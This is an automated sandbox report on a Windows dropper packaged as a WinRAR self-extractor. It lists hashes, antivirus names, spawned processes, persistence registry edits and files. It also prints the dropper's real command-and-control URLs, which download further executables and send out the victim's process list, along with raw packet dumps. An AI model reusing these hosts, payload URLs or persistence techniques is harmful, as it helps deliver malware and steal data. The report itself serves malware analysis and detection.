Analysis Date: 2013-10-24 16:44:10
MD5: 1160b04e3183fbb303b9592aa6b77535
SHA1: 34f9d0dcc32b8c1f40024db582ae6cc9a98aa3a8

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: bdb02840d1de7403793bef402d4fd932 sha1: 1a6c4d6a4b25f7f5e56a28bd8011a16ed0a77e94 size: 67584
Section .rdata md5: 0c817f45c4bbfa6f71b9a36721a782aa sha1: 0b94d64b15b77293b1d6fb54a4876215814f4a95 size: 6144
Section .data md5: 2821477811bfd11f4acd2c1da2aba6da sha1: f28af599dffabff91bb1c6fce831f020e4799fa8 size: 512
Section .CRT md5: 8f145b33e44f60719eb8afa09e213512 sha1: c77f4bbfe96b04f1834e748667637410ce7a0a8f size: 512
Section .rsrc md5: 88667f74f73ff91d60ca18a2671deeaa sha1: 55b837e4a1ba7177c8591d7b70cba14b968f143d size: 16384
Timestamp: 2009-06-30 06:15:12
Pdb path: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb
PEhash: 6231dbd8c7a9c2d2346844f778a44f75bb41351a
AV avg: Generic14.DLD
AV clamav: Win.Trojan.Agent-108584
AV msse: Worm:VBS/VBSWGbased.gen
AV msse: TrojanDownloader:Win32/Small.AHM
AV msse: Trojan:Win32/Sisproc
AV avira: TR/Dropper.Gen
AV msse: Trojan:Win32/Flymux.A
AV msse: Trojan:Win32/Swisyn.F

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\WinRAR SFX\C%%Documents and Settings%Administrator%Local Settings%Temp% ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\\\x00
Creates File: small.exe
Creates File: __tmp_rar_sfx_access_check_72296
Creates File: b2.exe
Creates File: 106.exe
Creates File: 1111.exe
Creates File: ad005.exe
Creates File: a1.vbs
Deletes File: __tmp_rar_sfx_access_check_72296
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\b2.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\ad005.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\ad005.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\106.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\1111.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\small.exe

Process
↳ cmd.exe /c rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\NotDel.inf

Creates Process: rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\NotDel.inf

Process
↳ cmd.exe /c rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\NotDel.inf

Creates Process: rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\Favorites.inf

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\small.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\LockPage\LockPageNum ➝
NULL
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\Plug\PlugUserName ➝
full12\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\PlugName\LogonName ➝
sfbj2.dll\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\CSID\csid ➝
{C4560D12-CE25-4A2E-A5D4-B5070FCBE282}\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\PlugDown\PlugOne ➝
1.0.0\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\WebIni\WebIniVer ➝
1.0.0\\x00
Creates File: C:\WINDOWS\system32\sufqkn.exe
Creates File: C:\WINDOWS\System32\sfbj2.dll
Creates File: C:\WINDOWS\System32\sfbji.dll
Creates File: 375O540.bat
Creates File: C:\WINDOWS\System32\dllcache\sfbj2.dll
Creates File: C:\WINDOWS\System32\ghjik.dll
Creates Process: 375O540.bat
Creates Process: C:\WINDOWS\system32\sufqkn.exe
Creates Process: regsvr32 /s C:\WINDOWS\System32\sfbji.dll
Creates Process: rundll32 sfbj2.dll , InstallMyDll
Creates Process: regsvr32 /s C:\WINDOWS\System32\ghjik.dll
Creates Mutex: DBWinMutex

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\106.exe

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0006\NetworkAddress ➝
222222222222\\x00
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\NetworkAddress ➝
222222222222\\x00
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\NetworkAddress ➝
222222222222\\x00
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\NetworkAddress ➝
222222222222\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\NetworkAddress ➝
222222222222\\x00
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\NetworkAddress ➝
222222222222\\x00
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\NetworkAddress ➝
222222222222\\x00
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008\NetworkAddress ➝
222222222222\\x00
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\NetworkAddress ➝
222222222222\\x00
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0005\NetworkAddress ➝
222222222222\\x00
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004\NetworkAddress ➝
222222222222\\x00
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007\NetworkAddress ➝
222222222222\\x00
Creates File: C:\WINDOWS\system32\Favorites.inf
Creates File: C:\WINDOWS\Favorites\AV\\xc3\\x94\\xc2\\xb0.lnk
Creates File: C:\WINDOWS\system32\NotDel.inf
Creates File: C:\WINDOWS\system32\RCX3.tmp
Creates File: C:\AV\\xc3\\x94\\xc2\\xb0.lnk
Creates File: C:\WINDOWS\system32\ctfmon.exe
Creates File: \Device\Netbios
Creates File: C:\WINDOWS\system32\vic1.tmp
Creates File: PIPE\wkssvc
Creates File: C:\AV\\xc3\\x94\\xc2\\xb0.lnk
Deletes File: C:\WINDOWS\system32\Favorites.inf
Deletes File: C:\WINDOWS\system32\vic1.tmp
Deletes File: C:\WINDOWS\system32\NotDel.inf
Deletes File: C:\WINDOWS\system32\hos2.tmp
Creates Process: cmd.exe /c rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\NotDel.inf
Creates Process: cmd.exe /c rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\NotDel.inf
Creates Mutex: oye
Winsock URL: http://www.baidu.com/index.html?id=10006
Winsock URLhttp://121.12.104.26:16//jilu.asp?mac=\\x94\\\xc3w\\x80%\\xc1w\\xff\\xff\\xff\\xff\\xad\\x03\\xc3w\\xb2\\xed\\xc3w\\x03&ver=2010-08-05&TG=10006&CP=seo&key=-101&JC=30&YP=c059900a&LJ=[System Process];System;smss.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;svchost.exe;svchost.exe;svchost.exe;svchost.exe;svchost.exe;spoolsv.exe;alg.exe;userinit.exe;explorer.exe;reader_sl.exe;svchost.exe;monitor.exe;106.exe;1111.exe;rundll32.exe;ad005.exe;cmd.exe;rundll32.exe;wmiprvse.exe;wscript.exe;alh.exe;cmd.exe;rundll32.exe;
Winsock URL: http://121.12.104.26:16/seo/xxjfldsjflj10006.rar

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\1111.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell ➝
explorer.exe,c:\windows\system32\SVDH0ST.exe\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Desktop\chajianlm\ ➝
chajianlm\\x00
Creates File: c:\windows\system32\mingdan.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: c:\windows\system32\SVDH0ST.exe
Creates File: \Device\Netbios
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\WINDOWS\system32\sipadaad.txt
Creates File: c:\windows\system32\SVCH0SP.EXE
Creates File: c:\windows\system32\andan.txt
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: c:\windows\system32\SVCH0SP.dll
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\~DFE89C.tmp
Creates Process: cmd /c regsvr32 /s c:\windows\system32\SVCH0SP.dll
Creates Process: SVCH0SP.EXE
Winsock DNS: wwwwww.adq.cc
Winsock DNS: adq.cc
Winsock URL: http://wwwwww.adq.cc:81/ad/andan.rar?id=chajianlm
Winsock URL: http://wwwwww.adq.cc:81/ALexa/aabbcc10004.rar?mac=00-00-00-00-00-001
Winsock URL: http://wwwwww.adq.cc:81/ad/Url.rar?id=chajianlm
Winsock URL: http://wwwwww.adq.cc:81/ALexa/aabbcc10004.rar?mac=00-00-00-00-00-002
Winsock URL: http://wwwwww.adq.cc:81/ALexa/aabbcc10004.rar?mac=00-00-00-00-00-00
Winsock URL: ?id=chajianlm

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\ad005.exe

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\ad005.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\ad005.exe

Creates File: c:\SaveTxta716.txt
Creates File: C:\Program Files\Docmentt\vxvof.exe
Creates Process: C:\Program Files\Docmentt\vxvof.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\b2.exe

Creates File: C:\WINDOWS\system32\tbhdz.ico
Creates File: PHYSICALDRIVE0
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\alh.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\alh.exe

Process
↳ rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\NotDel.inf

Process
↳ rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:\WINDOWS\system32\Favorites.inf

Process
↳ regsvr32 /s C:\WINDOWS\System32\sfbji.dll

Registry: HKEY_CLASSES_ROOT\TestAtl.ATlMy.1\ ➝
ATlMy Class\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler\{C4560D12-CE25-4A2E-A5D4-B5070FCBE282} ➝
csiddll\\x00
Registry: HKEY_CLASSES_ROOT\TestAtl.ATlMy\ ➝
ATlMy Class\\x00
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PhysicalDrive0
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: dllmux
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ rundll32 sfbj2.dll , InstallMyDll

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\Plug\PlugSendNum ➝
1
Creates File: PhysicalDrive0
Creates Mutex: dllmux

Process
↳ C:\WINDOWS\system32\sufqkn.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden ➝
NULL

Process
↳ regsvr32 /s C:\WINDOWS\System32\ghjik.dll

Process
↳ 375O540.bat

Process
↳ cmd /c regsvr32 /s c:\windows\system32\SVCH0SP.dll

Process
↳ SVCH0SP.EXE

Process
↳ C:\Program Files\Docmentt\vxvof.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\alh.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: PHYSICALDRIVE0
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\228.tmp
Deletes File: C:\WINDOWS\VB.ini
Winsock DNS: 2.765321.info

Network Details:

DNS: www.qq678.info
Type: A
82.98.86.174
DNS: www.a.shifen.com
Type: A
180.76.3.151
DNS: 2.765321.info
Type: A
82.98.86.169
DNS: www.abc789.info
Type: A
202.172.28.165
DNS: www.superqqface.com
Type: A
DNS: www.baidu.com
Type: A
DNS: adq.cc
Type: A
DNS: wwwwww.adq.cc
Type: A
HTTP GEThttp://121.12.104.26:16//jilu.asp?mac=.\.w.%.w.......w...w.&ver=2010-08-05&TG=10006&CP=seo&key=-101&JC=30&YP=c059900a&LJ=[System%20Process];System;smss.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;svchost.exe;svchost.exe;svchost.exe;svchost.exe;svchost.exe;spoolsv.exe;alg.exe;userinit.exe;explorer.exe;reader_sl.exe;svchost.exe;monitor.exe;106.exe;1111.exe;rundll32.exe;ad005.exe;cmd.exe;rundll32.exe;wmiprvse.exe;wscript.exe;alh.exe;cmd.exe;rundll32.exe;
User-Agent: RookIE/1.0
HTTP GET: http://www.qq678.info/xuke/bat/aq1.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.baidu.com/index.html?id=10006
User-Agent: RookIE/1.0
HTTP GET: http://www.qq678.info/xuke/csrss.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.765321.info:4321/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-24_14:50:28&msg=01702830524047&pauid=1126711&fy=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.765321.info:4321/sms/xxx4.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://121.12.104.26:16/seo/xxjfldsjflj10006.rar
User-Agent: RookIE/1.0
HTTP GET: http://www.abc789.info/xuke/winlogon.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.765321.info:4321/sms/xxx01.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.765321.info:4321/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-24_14:50:28&msg=01702830524047&pauid=1126711&fy=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://121.12.104.26:16/seo/xxjfldsjflj10006.rar
User-Agent: RookIE/1.0
HTTP GET: http://2.765321.info:4321/sms/xxx4.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.765321.info:4321/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-24_14:50:28&msg=01702830524047&pauid=1126711&fy=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.765321.info:4321/sms/xxx01.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.765321.info:4321/sms/xxx4.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.765321.info:4321/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-24_14:50:28&msg=01702830524047&pauid=1126711&fy=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.765321.info:4321/sms/xxx01.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.765321.info:4321/sms/xxx4.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.765321.info:4321/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-24_14:50:28&msg=01702830524047&pauid=1126711&fy=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 121.12.104.26:16
Flows TCP: 192.168.1.1:1035 ➝ 82.98.86.174:80
Flows TCP: 192.168.1.1:1037 ➝ 180.76.3.151:80
Flows TCP: 192.168.1.1:1039 ➝ 82.98.86.174:80
Flows TCP: 192.168.1.1:1040 ➝ 82.98.86.169:4321
Flows TCP: 192.168.1.1:1041 ➝ 82.98.86.169:4321
Flows TCP: 192.168.1.1:1042 ➝ 121.12.104.26:16
Flows TCP: 192.168.1.1:1043 ➝ 202.172.28.165:80
Flows TCP: 192.168.1.1:1044 ➝ 82.98.86.169:4321
Flows TCP: 192.168.1.1:1045 ➝ 82.98.86.169:4321
Flows TCP: 192.168.1.1:1046 ➝ 121.12.104.26:16
Flows TCP: 192.168.1.1:1047 ➝ 82.98.86.169:4321
Flows TCP: 192.168.1.1:1048 ➝ 82.98.86.169:4321
Flows TCP: 192.168.1.1:1049 ➝ 82.98.86.169:4321
Flows TCP: 192.168.1.1:1050 ➝ 82.98.86.169:4321
Flows TCP: 192.168.1.1:1051 ➝ 82.98.86.169:4321
Flows TCP: 192.168.1.1:1052 ➝ 82.98.86.169:4321
Flows TCP: 192.168.1.1:1053 ➝ 82.98.86.169:4321
Flows TCP: 192.168.1.1:1054 ➝ 82.98.86.169:4321

Raw Pcap
0x00000000 (00000)   47455420 2f2f6a69 6c752e61 73703f6d   GET //jilu.asp?m
0x00000010 (00016)   61633d94 5cc37780 25c177ff ffffffad   ac=.\.w.%.w.....
0x00000020 (00032)   03c377b2 edc37703 26766572 3d323031   ..w...w.&ver=201
0x00000030 (00048)   302d3038 2d303526 54473d31 30303036   0-08-05&TG=10006
0x00000040 (00064)   2643503d 73656f26 6b65793d 2d313031   &CP=seo&key=-101
0x00000050 (00080)   264a433d 33302659 503d6330 35393930   &JC=30&YP=c05990
0x00000060 (00096)   3061264c 4a3d5b53 79737465 6d253230   0a&LJ=[System%20
0x00000070 (00112)   50726f63 6573735d 3b537973 74656d3b   Process];System;
0x00000080 (00128)   736d7373 2e657865 3b637372 73732e65   smss.exe;csrss.e
0x00000090 (00144)   78653b77 696e6c6f 676f6e2e 6578653b   xe;winlogon.exe;
0x000000a0 (00160)   73657276 69636573 2e657865 3b6c7361   services.exe;lsa
0x000000b0 (00176)   73732e65 78653b73 7663686f 73742e65   ss.exe;svchost.e
0x000000c0 (00192)   78653b73 7663686f 73742e65 78653b73   xe;svchost.exe;s
0x000000d0 (00208)   7663686f 73742e65 78653b73 7663686f   vchost.exe;svcho
0x000000e0 (00224)   73742e65 78653b73 7663686f 73742e65   st.exe;svchost.e
0x000000f0 (00240)   78653b73 706f6f6c 73762e65 78653b61   xe;spoolsv.exe;a
0x00000100 (00256)   6c672e65 78653b75 73657269 6e69742e   lg.exe;userinit.
0x00000110 (00272)   6578653b 6578706c 6f726572 2e657865   exe;explorer.exe
0x00000120 (00288)   3b726561 6465725f 736c2e65 78653b73   ;reader_sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f78756b 652f6261 742f6171   GET /xuke/bat/aq
0x00000010 (00016)   312e6874 6d6c2048 5454502f 312e310d   1.html HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000030 (00048)   63657074 2d4c616e 67756167 653a2065   cept-Language: e
0x00000040 (00064)   6e2d7573 0d0a4163 63657074 2d456e63   n-us..Accept-Enc
0x00000050 (00080)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000060 (00096)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000070 (00112)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000080 (00128)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000090 (00144)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x000000a0 (00160)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000b0 (00176)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000c0 (00192)   6f73743a 20777777 2e717136 37382e69   ost: www.qq678.i
0x000000d0 (00208)   6e666f0d 0a436f6e 6e656374 696f6e3a   nfo..Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a65    Keep-Alive....e
0x000000f0 (00240)   78653b73 706f6f6c 73762e65 78653b61   xe;spoolsv.exe;a
0x00000100 (00256)   6c672e65 78653b75 73657269 6e69742e   lg.exe;userinit.
0x00000110 (00272)   6578653b 6578706c 6f726572 2e657865   exe;explorer.exe
0x00000120 (00288)   3b726561 6465725f 736c2e65 78653b73   ;reader_sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f696e64 65782e68 746d6c3f   GET /index.html?
0x00000010 (00016)   69643d31 30303036 20485454 502f312e   id=10006 HTTP/1.
0x00000020 (00032)   310d0a55 7365722d 4167656e 743a2052   1..User-Agent: R
0x00000030 (00048)   6f6f6b49 452f312e 300d0a48 6f73743a   ookIE/1.0..Host:
0x00000040 (00064)   20777777 2e626169 64752e63 6f6d0d0a    www.baidu.com..
0x00000050 (00080)   0d0a696e 673a2067 7a69702c 20646566   ..ing: gzip, def
0x00000060 (00096)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000070 (00112)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000080 (00128)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000090 (00144)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x000000a0 (00160)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000b0 (00176)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000c0 (00192)   6f73743a 20777777 2e717136 37382e69   ost: www.qq678.i
0x000000d0 (00208)   6e666f0d 0a436f6e 6e656374 696f6e3a   nfo..Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a65    Keep-Alive....e
0x000000f0 (00240)   78653b73 706f6f6c 73762e65 78653b61   xe;spoolsv.exe;a
0x00000100 (00256)   6c672e65 78653b75 73657269 6e69742e   lg.exe;userinit.
0x00000110 (00272)   6578653b 6578706c 6f726572 2e657865   exe;explorer.exe
0x00000120 (00288)   3b726561 6465725f 736c2e65 78653b73   ;reader_sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
0x00000140 (00320)   6f722e65 78653b31 30362e65 78653b31   or.exe;106.exe;1
0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f78756b 652f6373 7273732e   GET /xuke/csrss.
0x00000010 (00016)   65786520 48545450 2f312e31 0d0a4163   exe HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a207777 772e7171   7)..Host: www.qq
0x000000b0 (00176)   3637382e 696e666f 0d0a436f 6e6e6563   678.info..Connec
0x000000c0 (00192)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 0a436f6e 6e656374 696f6e3a   .....Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a65    Keep-Alive....e
0x000000f0 (00240)   78653b73 706f6f6c 73762e65 78653b61   xe;spoolsv.exe;a
0x00000100 (00256)   6c672e65 78653b75 73657269 6e69742e   lg.exe;userinit.
0x00000110 (00272)   6578653b 6578706c 6f726572 2e657865   exe;explorer.exe
0x00000120 (00288)   3b726561 6465725f 736c2e65 78653b73   ;reader_sl.exe;s
0x00000130 (00304)   7663686f 73742e65 78653b6d 6f6e6974   vchost.exe;monit
